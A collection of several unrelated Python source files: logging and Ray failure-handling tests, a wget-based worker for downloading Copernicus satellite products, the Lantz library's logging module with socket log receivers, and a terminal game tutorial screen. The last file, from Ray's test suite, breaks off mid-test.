result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception as e:
print('exception in diagnostic code: %s' % e, file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
not_exported = {
'logThreads', 'logMultiprocessing', 'logProcesses', 'currentframe',
'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
'Filterer', 'PlaceHolder', 'Manager', 'RootLogger', 'root',
'threading', 'logAsyncioTasks'}
support.check__all__(self, logging, not_exported=not_exported)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
def setUpModule():
unittest.enterModuleContext(support.run_with_locale('LC_ALL', ''))
if __name__ == "__main__":
unittest.main()
|
worker.py
|
import os
import subprocess
import json
import time
from multiprocessing import Lock, Process
from threading import Thread
import logging
import sys
import re
import zipfile
import colorama
from colorama import Fore, Back, Style
from .resumable import Resumable
from .loggable import Loggable
class Worker(Resumable, Loggable):
request_lock = Lock()
log_download_progress_lock = Lock()
worker_instances_list = []
def __init__(self, worker_name, username, password):
Resumable.__init__(self)
Loggable.__init__(self)
self.username = username
self.password = password
self.name = worker_name
self.workdir = None
self.query = None
self.download_location = None
self.polling_interval = None
self.offline_retries = None
self.logger = None
self.return_msg = None
self.download_bar = None
self.colour = ""
Worker.worker_instances_list.append(self)
Worker.assign_colours()
def __del__(self):
try:
Worker.worker_instances_list.remove(self)
except ValueError as e:
pass
@classmethod
def assign_colours(cls):
'''Assign each worker instance a background colour when logging download progress'''
for i in range(0, len(cls.worker_instances_list)):
mode = i % 6
if mode == 0:
cls.worker_instances_list[i].colour = Back.CYAN + Style.BRIGHT
elif mode == 1:
cls.worker_instances_list[i].colour = Back.MAGENTA + Style.BRIGHT
elif mode == 2:
cls.worker_instances_list[i].colour = Back.BLUE + Style.BRIGHT
elif mode == 3:
cls.worker_instances_list[i].colour = Back.GREEN + Style.BRIGHT
elif mode == 4:
cls.worker_instances_list[i].colour = Back.YELLOW + Style.BRIGHT + Fore.RED
elif mode == 5:
cls.worker_instances_list[i].colour = Back.RED + Style.BRIGHT
def setup(self, workdir):
self.workdir = workdir
self.logger = self._setup_logger(self.name, self.workdir)
progress_log_path = os.path.join(self.workdir, self.name + '_progress.txt')
self._setup_progress_log(progress_log_path)
def query_total_results(self, query):
''' Get the total number of products in a search query
Args:
query (str): a query that request a response in json
Returns:
total_results (int): the total number of product results from the query response
'''
json_file = "res.json"
try:
cmd = ["wget", "--no-check-certificate", "--user=" + self.username, "--password=" + self.password, "-O", json_file, query]
subprocess.call(cmd)
res_json = json.load(open(json_file))
total_results = int(res_json["feed"]["opensearch:totalResults"])
if total_results <= 0:
raise ValueError
os.remove(json_file)
return total_results
except Exception as e:
raise
def query_product_uri(self, result_num):
'''
params: result number
returns: title and product_uri, eg. "S1A_IW_GRDH_1SDV_20181011T115601_20181011T115626_024088_02A208_C886", "https://scihub.copernicus.eu/dhus/odata/v1/Products('7bc7da0c-8241-4bbe-8d59-1661667c6161')/$value"
'''
query = self.query + str(result_num)
self.logger.debug(query)
json_file = self.name + "_res.json"
try:
cmd = ["wget", "--no-check-certificate", "--user=" + self.username, "--password=" + self.password, "-O", json_file, query]
subprocess.call(cmd)
res_json = json.load(open(json_file))
title = str(res_json["feed"]["entry"]["title"])
product_uri = str(res_json["feed"]["entry"]["link"][0]["href"])
os.remove(json_file)
return title, product_uri
except Exception as e:
raise
def query_product_uri_with_retries(self, result_number, max_retries=3):
title = None
product_uri = None
uri_query_retries = 0
uri_query_max_retries = max_retries
while uri_query_retries <= uri_query_max_retries and (title is None or product_uri is None):
try:
self._prepare_to_request()
title, product_uri = self.query_product_uri(result_number)
except Exception as e:
self.logger.error(e)
self.logger.error(Fore.RED + "Error in querying product uri from result number.")
self.logger.error("Retrying " + str(uri_query_retries) + " out of " + str(uri_query_max_retries) + " times.")
uri_query_retries += 1
return title, product_uri
def download_product(self, file_path, product_uri):
'''Download product in a non blocking wget subprocess
Args:
file_path (str): path to file where downloaded content will be written to, eg ./product.zip
product_uri (str): eg. https://scihub.copernicus.eu/dhus/odata/v1/Products('bc8421bd-2930-48eb-9caf-7b8d23df36eb')/$value
Return:
proc (subprocess.Popen): a Popen object that is runnng the download process
'''
try:
cmd = ["wget", "-O", file_path, "--continue", "--user=" + self.username, "--password=" + self.password, product_uri]
proc = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, text=True, universal_newlines=True)
return proc
except Exception as e:
raise
def _log_download_progress(self, proc, title, file_size):
'''logs the the relevant info of a wget download process
Args:
proc (subprocess.Popen): Popen object running wget download process, with stderr piped to stdout
title (str): name of downloaded file
file_size (int): full size of file to be downloaded
'''
while proc.poll() is None:
line = proc.stdout.readline()
if line:
msg = None
try:
response = re.search(r'HTTP request sent, awaiting response... .+', line).group(0)
msg = title + ", " + response
except AttributeError as e:
pass
try:
progress_perc = r'\d+%'
progress_perc = re.search(progress_perc, line).group(0)
time_left = r'(\d+[hms])+'
time_left = re.search(time_left, line).group(0)
downloaded = r'\d+[KM]'
downloaded = re.search(downloaded, line).group(0)
msg = title + ', Progress: ' + progress_perc + ', Downloaded: ' + downloaded + '/' + str(file_size) + ', Time left: ' + time_left
except AttributeError as e:
pass
if msg:
self.log_download_progress_lock.acquire()
self.logger.info(self.colour + msg)
self.log_download_progress_lock.release()
else:
proc.stdout.flush()
def query_product_size(self, product_uri):
''' Query the file size of product
Args:
product uri (str): eg. https://scihub.copernicus.eu/dhus/odata/v1/Products('23759763-91e8-4336-a50a-a143e14c8d69')/$value
Returns:
product file size in bytes (int) or None if product_uri query failed
'''
try:
cmd = ["wget", "--spider", "--user=" + self.username, "--password=" + self.password, product_uri]
out = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
m = re.search(r'(?<=Length: )\d+', str(out))
length = int(m.group(0))
return length
except Exception as e:
self.logger.error(e)
self.logger.error("Error in querying product size for " + product_uri)
return None
def get_downloaded_product_size(self, file_path):
try:
b = os.path.getsize(file_path)
return int(b)
except Exception as e:
self.logger.error(e)
def _hold_lock(self, request_lock):
self.logger = self._setup_logger(self.name, self.workdir)
self.logger.debug("\n\n" + self.name + " has the lock. Ready to send requests...\n\n")
time.sleep(5)
request_lock.release()
def _prepare_to_request(self):
''' prepare to send a request by acquiring lock.
Has 5 seconds to be the only one making a request while holding lock
'''
self.request_lock.acquire()
hold_lock_thread = Thread(target=self._hold_lock, args=(self.request_lock,))
hold_lock_thread.start()
def register_settings(self, query, download_location, polling_interval, offline_retries):
self.query = query
self.download_location = download_location
self.polling_interval = polling_interval
self.offline_retries = offline_retries
def _is_bad_zipfile(self, file_path):
try:
with zipfile.ZipFile(file_path) as zf:
zf.close()
return False
except zipfile.BadZipFile as e:
self.logger.error(file_path + " could not be opened.")
return True
except Exception as e:
self.logger.error(e)
def run(self, result_num, uri_query_max_retries=3):
status = None
title, product_uri = self.query_product_uri_with_retries(result_num)
file_path = os.path.join(self.download_location, title + ".zip")
complete_product_size = self.query_product_size(product_uri)
max_attempts = self.offline_retries + 1
for attempt in range(1, self.offline_retries + 2):
self.logger.info("Download attempt number " + str(attempt) + " of " + str(max_attempts))
self._prepare_to_request()
self.logger.info(Fore.GREEN + "Begin downloading\n" + title + "\nat\n" + product_uri + "\n")
proc = self.download_product(file_path, product_uri)
self._log_download_progress(proc, title, complete_product_size)
product_size = self.get_downloaded_product_size(file_path)
if product_size == 0:
self.logger.warning(Fore.YELLOW + "Product could be offline. Retrying after " + str(self.polling_interval) + " seconds.")
status = "OFFLINE"
time.sleep(self.polling_interval)
elif product_size < complete_product_size:
self.logger.warning(Fore.YELLOW + "There was a break in connection.")
status = "FAILED"
else:
if self._is_bad_zipfile(file_path):
self.logger.error("Product download failed.")
status = "FAILED"
else:
self.logger.info(Fore.GREEN + "Downloaded product " + title)
status = "SUCCESS"
break
outcome = self.name + " " + title + " " + status
self.logger.info(outcome)
return outcome
def run_in_seperate_process(self, result_num, ready_worker_queue, request_lock, log_download_progress_lock):
# Setting up logger again because logger is shallow copied to new process and looses setup
self.logger = self._setup_logger(self.name, self.workdir)
self.request_lock = request_lock
self.log_download_progress_lock = log_download_progress_lock
self.return_msg = None
self.update_resume_point(result_num)
self.logger.info("running worker" + self.name)
self.return_msg = self.run(result_num)
self._close_all_loggers()
self.request_lock = None
self.log_download_progress_lock = None
ready_worker_queue.put(self)
|
log.py
|
# -*- coding: utf-8 -*-
"""
lantz.core.log
~~~~~~~~~~~~~~
Implements logging support for Lantz.
:copyright: 2018 by The Lantz Authors
:license: BSD, see LICENSE for more details.
"""
import pickle
import select
import socket
import struct
import logging
import threading
from logging import DEBUG, INFO, WARNING, ERROR, CRITICAL
from logging.handlers import SocketHandler
from logging.handlers import DEFAULT_UDP_LOGGING_PORT
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
from stringparser import Parser
from . import config
class _LogRecord(logging.LogRecord):
def getMessage(self):
"""Return the message for this LogRecord."""
msg = str(self.msg)
if self.args:
if '%s' in msg:
msg = msg % self.args
else:
msg = msg.format(*self.args)
return msg
def _makeRecord(name, level, fn, lno, msg, args, exc_info,
func=None, extra=None, sinfo=None):
"""A factory method which can be overridden in subclasses to create
specialized LogRecords.
"""
rv = _LogRecord(name, level, fn, lno, msg, args, exc_info, func, sinfo)
if extra is not None:
for key in extra:
if (key in ["message", "asctime"]) or (key in rv.__dict__):
raise KeyError("Attempt to overwrite %r in LogRecord" % key)
rv.__dict__[key] = extra[key]
return rv
def get_logger(name, add_NullHandler=True, patch_makeRecord=True):
"""
Parameters
----------
name :
add_NullHandler :
(Default value = True)
patch_makeRecord :
(Default value = True)
Returns
-------
type
if patch_makeRecord, the logger makeRecord will be replaced with a PEP3101 compatible version.
"""
logger = logging.getLogger(name)
if add_NullHandler:
logger.addHandler(logging.NullHandler())
if patch_makeRecord:
logger.makeRecord = _makeRecord
return logger
LOGGER = get_logger('lantz')
class ColorizingFormatter(logging.Formatter):
"""Color capable logging formatter.
Use <color> </color> to enclose text to colorize.
Parameters
----------
Returns
-------
"""
SPLIT_COLOR = Parser('{0:s}<color>{1:s}</color>{2:s}')
SCHEME = {'bw': {logging.DEBUG: '',
logging.INFO: '',
logging.WARNING: '',
logging.ERROR: '',
logging.CRITICAL: ''}
}
@classmethod
def add_color_schemes(cls, style, fore, back):
"""
Parameters
----------
style :
fore :
back :
Returns
-------
"""
cls.format = cls.color_format
cls.SCHEME.update(bright={DEBUG: style.NORMAL,
INFO: style.NORMAL,
WARNING: style.BRIGHT,
ERROR: style.BRIGHT,
CRITICAL: style.BRIGHT},
simple={DEBUG: fore.BLUE + style.BRIGHT,
INFO: back.WHITE + fore.BLACK,
WARNING: fore.YELLOW + style.BRIGHT,
ERROR: fore.RED + style.BRIGHT,
CRITICAL: back.RED + fore.WHITE + style.BRIGHT},
whitebg={DEBUG: fore.BLUE + style.BRIGHT,
INFO: back.WHITE + fore.BLACK,
WARNING: fore.YELLOW + style.BRIGHT,
ERROR: fore.RED + style.BRIGHT,
CRITICAL: back.RED + fore.WHITE + style.BRIGHT},
blackbg={DEBUG: fore.BLUE + style.BRIGHT,
INFO: fore.GREEN,
WARNING: fore.YELLOW + style.BRIGHT,
ERROR: fore.RED + style.BRIGHT,
CRITICAL: back.RED + fore.WHITE + style.BRIGHT}
)
cls.RESET_ALL = style.RESET_ALL
def __init__(self, fmt, datefmt='%H:%M:%S', style='%', scheme='bw'):
super().__init__(fmt, datefmt, style)
self.scheme = scheme
@property
def scheme(self):
""" """
return self.scheme
@scheme.setter
def scheme(self, value):
"""
Parameters
----------
value :
Returns
-------
"""
if isinstance(value, str):
self._scheme = self.SCHEME[value]
else:
self._scheme = value
def colorize(self, message, record):
"""Colorize message based on record level
Parameters
----------
message :
record :
Returns
-------
"""
if record.levelno in self._scheme:
color = self._scheme[record.levelno]
return color + message + self.RESET_ALL
return message
def color_format(self, record):
"""Format record into string, colorizing the text enclosed
within <color></color>
Parameters
----------
record :
Returns
-------
"""
message = super().format(record)
parts = message.split('\n', 1)
if '<color>' in parts[0] and '</color>' in parts[0]:
bef, dur, aft = self.SPLIT_COLOR(parts[0])
parts[0] = bef + self.colorize(dur, record) + aft
message = '\n'.join(parts)
return message
def init_colorama():
""" """
try:
from colorama import Fore, Back, Style, init as colorama_init
colorama_init()
colorama = True
DEFAULT_FMT = Style.NORMAL + '{asctime} <color>{levelname:8s}</color>' + Style.RESET_ALL + ' {message}'
ColorizingFormatter.add_color_schemes(Style, Fore, Back)
except Exception as e:
LOGGER.info('Log will not be colorized. Could not import colorama: {}', e)
colorama = False
DEFAULT_FMT = '{asctime} {levelname:8s} {message}'
return colorama, DEFAULT_FMT
colorama, DEFAULT_FMT = init_colorama()
class BaseServer(object):
"""Mixin for common server functionality"""
allow_reuse_address = True
def __init__(self, handler, timeout):
self._record_handler = handler
self._stop = threading.Event()
self.timeout = timeout
def handle_record(self, record):
"""
Parameters
----------
record :
Returns
-------
"""
self._record_handler(record)
def serve_until_stopped(self):
""" """
while not self._stop.isSet():
rd, wr, ex = self.select()
if rd:
self.handle_request()
self.server_close()
def select(self):
""" """
return select.select([self.socket.fileno()], [], [], self.timeout)
def stop(self):
""" """
self._stop.set()
class LogRecordStreamHandler(StreamRequestHandler):
"""Handler for a streaming logging request. It basically logs the record
using whatever logging policy is configured locally.
Parameters
----------
Returns
-------
"""
def handle(self):
"""Handle multiple requests - each expected to be a 4-byte length,
followed by the LogRecord in pickle format. Logs the record
according to whatever policy is configured locally.
Parameters
----------
Returns
-------
"""
while True:
try:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = _LogRecord(None, None, "", 0, "", (), None, None)
record.__dict__.update(obj)
self.server.handle_record(record)
except socket.error as e:
if not isinstance(e.args, tuple):
raise e
else:
if e.args[0] != logging.RESET_ERROR:
raise e
break
class LoggingTCPServer(ThreadingTCPServer, BaseServer):
"""A simple-minded TCP socket-based logging receiver suitable for test
purposes.
Parameters
----------
Returns
-------
"""
allow_reuse_address = True
def __init__(self, addr, handler, timeout=1):
ThreadingTCPServer.__init__(self, addr, LogRecordStreamHandler)
BaseServer.__init__(self, handler, timeout)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
class LogRecordDatagramHandler(DatagramRequestHandler):
"""Handler for a datagram logging request. It basically logs the record
using whatever logging policy is configured locally.
Parameters
----------
Returns
-------
"""
def handle(self):
""" """
chunk = self.packet
slen = struct.unpack(">L", chunk[:4])[0]
chunk = chunk[4:]
assert len(chunk) == slen
obj = pickle.loads(chunk)
record = _LogRecord(None, None, "", 0, "", (), None, None)
record.__dict__.update(obj)
self.server.handle_record(record)
def finish(self):
""" """
pass
class LoggingUDPServer(ThreadingUDPServer, BaseServer):
"""A simple-minded UDP datagram-based logging receiver suitable for test
purposes.
Parameters
----------
Returns
-------
"""
def __init__(self, addr, handler, timeout=1):
ThreadingUDPServer.__init__(self, addr, LogRecordDatagramHandler)
BaseServer.__init__(self, handler, timeout)
class SocketListener(object):
"""Print incoming log recored to tcp and udp ports."""
def __init__(self, tcphost, udphost):
self.tcp_addr = get_address(tcphost)
self.udp_addr = get_address(udphost, DEFAULT_UDP_LOGGING_PORT)
self.start()
def start(self):
""" """
self._lock = threading.RLock()
s = LoggingTCPServer(self.tcp_addr, self.on_record, 1)
self.tcp_server = s
self.tcp_thread = t = threading.Thread(target=s.serve_until_stopped)
t.setDaemon(True)
t.start()
s = LoggingUDPServer(self.udp_addr, self.on_record, 1)
self.udp_server = s
self.udp_thread = t = threading.Thread(target=s.serve_until_stopped)
t.setDaemon(True)
t.start()
def stop(self):
""" """
self.tcp_server.stop()
self.tcp_thread.join()
self.udp_server.stop()
self.udp_thread.join()
def on_record(self, record):
"""
Parameters
----------
record :
Returns
-------
"""
pass
def log_to_socket(level=logging.INFO, host=config.TCP_LOGGING_HOST,
port=config.TCP_LOGGING_PORT):
"""Log all Lantz events to a socket with a specific host address and port.
Parameters
----------
level :
logging level for the lantz handler (Default value = logging.INFO)
host :
socket host (default config.TCP_LOGGING_HOST)
port :
socket port (default config.TCP_LOGGING_PORT)
Returns
-------
type
lantz logger
"""
handler = SocketHandler(host, port)
handler.setLevel(level)
LOGGER.addHandler(handler)
if LOGGER.getEffectiveLevel() > level:
LOGGER.setLevel(level)
return LOGGER
def log_to_screen(level=logging.INFO, scheme='blackbg'):
"""Log all Lantz events to the screen with a colorized terminal
Parameters
----------
level :
logging level for the lantz handler (Default value = logging.INFO)
scheme :
color scheme. Valid values are 'bw', 'bright', 'simple', 'whitebg', 'blackg' (Default value = 'blackbg')
Returns
-------
type
lantz logger
"""
handler = logging.StreamHandler()
handler.setLevel(level)
if not colorama:
scheme = 'bw'
handler.setFormatter(ColorizingFormatter(fmt=DEFAULT_FMT, scheme=scheme, style='{'))
LOGGER.addHandler(handler)
if LOGGER.getEffectiveLevel() > level:
LOGGER.setLevel(level)
return LOGGER
def get_address(value, default_port=config.TCP_LOGGING_PORT):
"""Split host:port string into (host, port) tuple
Parameters
----------
value :
host:port' string
default_port :
port used if not given (Default value = config.TCP_LOGGING_PORT)
Returns
-------
type
host, port)
"""
value = value.strip()
if ':' not in value[:-1]:
result = value, default_port
else:
h, p = value.split(':')
result = h, int(p)
return result
|
tutorial.py
|
from pathlib import Path
from threading import Thread
from typing import List
from playsound import playsound
import boxed
from boxed.border import draw_boundary
def display_tutorial(lines: List[str]) -> None:
"""Wraps and prints tutorial text"""
print(boxed.terminal.clear, end="")
print(
boxed.terminal.move(boxed.terminal.height - 3, boxed.terminal.width - 20)
+ f"Press {boxed.terminal.white_bold}B{boxed.terminal.normal} to go back"
)
draw_boundary()
print(boxed.terminal.move_xy(2, 2), end="")
lines = [
line.format(
title=boxed.terminal.white_underline + boxed.terminal.bold,
bold=boxed.terminal.bold,
normal=boxed.terminal.normal,
breakline=boxed.terminal.white_underline + boxed.terminal.normal,
)
for line in lines
]
for line in lines:
if line.startswith(boxed.terminal.white_underline):
print(boxed.terminal.move_down(1) + boxed.terminal.move_x(2), end="")
for wrapped_line in boxed.terminal.wrap(line, width=boxed.terminal.width - 4):
print(wrapped_line, end="")
print(boxed.terminal.move_down(1) + boxed.terminal.move_x(2), end="", flush=True)
def load_screen(file: Path) -> None:
"""Callback for loading screen"""
tutorial_text = file.read_text(encoding="utf8").splitlines()
terminal_size = 0, 0
with boxed.terminal.hidden_cursor():
with boxed.terminal.cbreak():
while True:
if terminal_size != (boxed.terminal.width, boxed.terminal.height):
display_tutorial(tutorial_text)
terminal_size = (boxed.terminal.width, boxed.terminal.height)
if boxed.terminal.inkey(timeout=0.1) == "b":
Thread(
target=lambda: playsound("music/up-down.wav"), daemon=True
).start()
return
|
test_failure.py
|
import json
import logging
import os
import signal
import sys
import tempfile
import threading
import time
import numpy as np
import pytest
import redis
import ray
import ray.utils
import ray.ray_constants as ray_constants
from ray.exceptions import RayTaskError
from ray.cluster_utils import Cluster
from ray.test_utils import (wait_for_condition, SignalActor, init_error_pubsub,
get_error_message, Semaphore)
def test_failed_task(ray_start_regular, error_pubsub):
@ray.remote
def throw_exception_fct1():
raise Exception("Test function 1 intentionally failed.")
@ray.remote
def throw_exception_fct2():
raise Exception("Test function 2 intentionally failed.")
@ray.remote(num_returns=3)
def throw_exception_fct3(x):
raise Exception("Test function 3 intentionally failed.")
p = error_pubsub
throw_exception_fct1.remote()
throw_exception_fct1.remote()
msgs = get_error_message(p, 2, ray_constants.TASK_PUSH_ERROR)
assert len(msgs) == 2
for msg in msgs:
assert "Test function 1 intentionally failed." in msg.error_message
x = throw_exception_fct2.remote()
try:
ray.get(x)
except Exception as e:
assert "Test function 2 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
x, y, z = throw_exception_fct3.remote(1.0)
for ref in [x, y, z]:
try:
ray.get(ref)
except Exception as e:
assert "Test function 3 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
class CustomException(ValueError):
pass
@ray.remote
def f():
raise CustomException("This function failed.")
try:
ray.get(f.remote())
except Exception as e:
assert "This function failed." in str(e)
assert isinstance(e, CustomException)
assert isinstance(e, ray.exceptions.RayTaskError)
assert "RayTaskError(CustomException)" in repr(e)
else:
# ray.get should throw an exception.
assert False
def test_push_error_to_driver_through_redis(ray_start_regular, error_pubsub):
address_info = ray_start_regular
address = address_info["redis_address"]
redis_client = ray._private.services.create_redis_client(
address, password=ray.ray_constants.REDIS_DEFAULT_PASSWORD)
error_message = "Test error message"
ray.utils.push_error_to_driver_through_redis(
redis_client, ray_constants.DASHBOARD_AGENT_DIED_ERROR, error_message)
errors = get_error_message(error_pubsub, 1,
ray_constants.DASHBOARD_AGENT_DIED_ERROR)
assert errors[0].type == ray_constants.DASHBOARD_AGENT_DIED_ERROR
assert errors[0].error_message == error_message
def test_get_throws_quickly_when_found_exception(ray_start_regular):
# We use an actor instead of functions here. If we use functions, it's
# very likely that two normal tasks are submitted before the first worker
# is registered to Raylet. Since `maximum_startup_concurrency` is 1,
# the worker pool will wait for the registration of the first worker
# and skip starting new workers. The result is, the two tasks will be
# executed sequentially, which breaks an assumption of this test case -
# the two tasks run in parallel.
@ray.remote
class Actor(object):
def bad_func1(self):
raise Exception("Test function intentionally failed.")
def bad_func2(self):
os._exit(0)
def slow_func(self, signal):
ray.get(signal.wait.remote())
def expect_exception(objects, exception):
with pytest.raises(ray.exceptions.RayError) as err:
ray.get(objects)
assert err.type is exception
signal1 = SignalActor.remote()
actor = Actor.options(max_concurrency=2).remote()
expect_exception(
[actor.bad_func1.remote(),
actor.slow_func.remote(signal1)], ray.exceptions.RayTaskError)
ray.get(signal1.send.remote())
signal2 = SignalActor.remote()
actor = Actor.options(max_concurrency=2).remote()
expect_exception(
[actor.bad_func2.remote(),
actor.slow_func.remote(signal2)], ray.exceptions.RayActorError)
ray.get(signal2.send.remote())
def test_fail_importing_remote_function(ray_start_2_cpus, error_pubsub):
p = error_pubsub
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define a function that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
def g(x, y=3):
try:
module.temporary_python_file()
except Exception:
# This test is not concerned with the error from running this
# function. Only from unpickling the remote function.
pass
# Invoke the function so that the definition is exported.
g.remote(1, y=2)
errors = get_error_message(
p, 2, ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR)
assert errors[0].type == ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR
assert "No module named" in errors[0].error_message
assert "No module named" in errors[1].error_message
# Check that if we try to call the function it throws an exception and
# does not hang.
for _ in range(10):
with pytest.raises(
Exception, match="This function was not imported properly."):
ray.get(g.remote(1, y=2))
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_function_to_run(ray_start_2_cpus, error_pubsub):
p = error_pubsub
def f(worker):
if ray.worker.global_worker.mode == ray.WORKER_MODE:
raise Exception("Function to run failed.")
ray.worker.global_worker.run_function_on_all_workers(f)
# Check that the error message is in the task info.
errors = get_error_message(p, 2, ray_constants.FUNCTION_TO_RUN_PUSH_ERROR)
assert len(errors) == 2
assert errors[0].type == ray_constants.FUNCTION_TO_RUN_PUSH_ERROR
assert "Function to run failed." in errors[0].error_message
assert "Function to run failed." in errors[1].error_message
def test_fail_importing_actor(ray_start_regular, error_pubsub):
p = error_pubsub
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
class Foo:
def __init__(self, arg1, arg2=3):
self.x = module.temporary_python_file()
def get_val(self, arg1, arg2=3):
return 1
# There should be no errors yet.
errors = get_error_message(p, 2)
assert len(errors) == 0
# Create an actor.
foo = Foo.remote(3, arg2=0)
errors = get_error_message(p, 2)
assert len(errors) == 2
for error in errors:
# Wait for the error to arrive.
if error.type == ray_constants.REGISTER_ACTOR_PUSH_ERROR:
assert "No module named" in error.error_message
else:
# Wait for the error from when the __init__ tries to run.
assert ("failed to be imported, and so cannot execute this method"
in error.error_message)
# Check that if we try to get the function it throws an exception and
# does not hang.
with pytest.raises(Exception, match="failed to be imported"):
ray.get(foo.get_val.remote(1, arg2=2))
# Wait for the error from when the call to get_val.
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert ("failed to be imported, and so cannot execute this method" in
errors[0].error_message)
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_actor_init(ray_start_regular, error_pubsub):
p = error_pubsub
error_message1 = "actor constructor failed"
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
raise Exception(error_message1)
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed constructor.
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message1 in errors[0].error_message
# Make sure that we get errors from a failed method.
a.fail_method.remote()
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message1 in errors[0].error_message
def test_failed_actor_method(ray_start_regular, error_pubsub):
p = error_pubsub
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
pass
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed method.
a.fail_method.remote()
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message2 in errors[0].error_message
def test_incorrect_method_calls(ray_start_regular):
@ray.remote
class Actor:
def __init__(self, missing_variable_name):
pass
def get_val(self, x):
pass
# Make sure that we get errors if we call the constructor incorrectly.
# Create an actor with too few arguments.
with pytest.raises(Exception):
a = Actor.remote()
# Create an actor with too many arguments.
with pytest.raises(Exception):
a = Actor.remote(1, 2)
# Create an actor the correct number of arguments.
a = Actor.remote(1)
# Call a method with too few arguments.
with pytest.raises(Exception):
a.get_val.remote()
# Call a method with too many arguments.
with pytest.raises(Exception):
a.get_val.remote(1, 2)
# Call a method that doesn't exist.
with pytest.raises(AttributeError):
a.nonexistent_method()
with pytest.raises(AttributeError):
a.nonexistent_method.remote()
def test_worker_raising_exception(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote(max_calls=2)
def f():
# This is the only reasonable variable we can set here that makes the
# execute_task function fail after the task got executed.
worker = ray.worker.global_worker
worker.function_actor_manager.increase_task_counter = None
# Running this task should cause the worker to raise an exception after
# the task has successfully completed.
f.remote()
errors = get_error_message(p, 1, ray_constants.WORKER_CRASH_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_CRASH_PUSH_ERROR
def test_worker_dying(ray_start_regular, error_pubsub):
p = error_pubsub
# Define a remote function that will kill the worker that runs it.
@ray.remote(max_retries=0)
def f():
eval("exit()")
with pytest.raises(ray.exceptions.WorkerCrashedError):
ray.get(f.remote())
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
assert "died or was killed while executing" in errors[0].error_message
def test_actor_worker_dying(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote
class Actor:
def kill(self):
eval("exit()")
@ray.remote
def consume(x):
pass
a = Actor.remote()
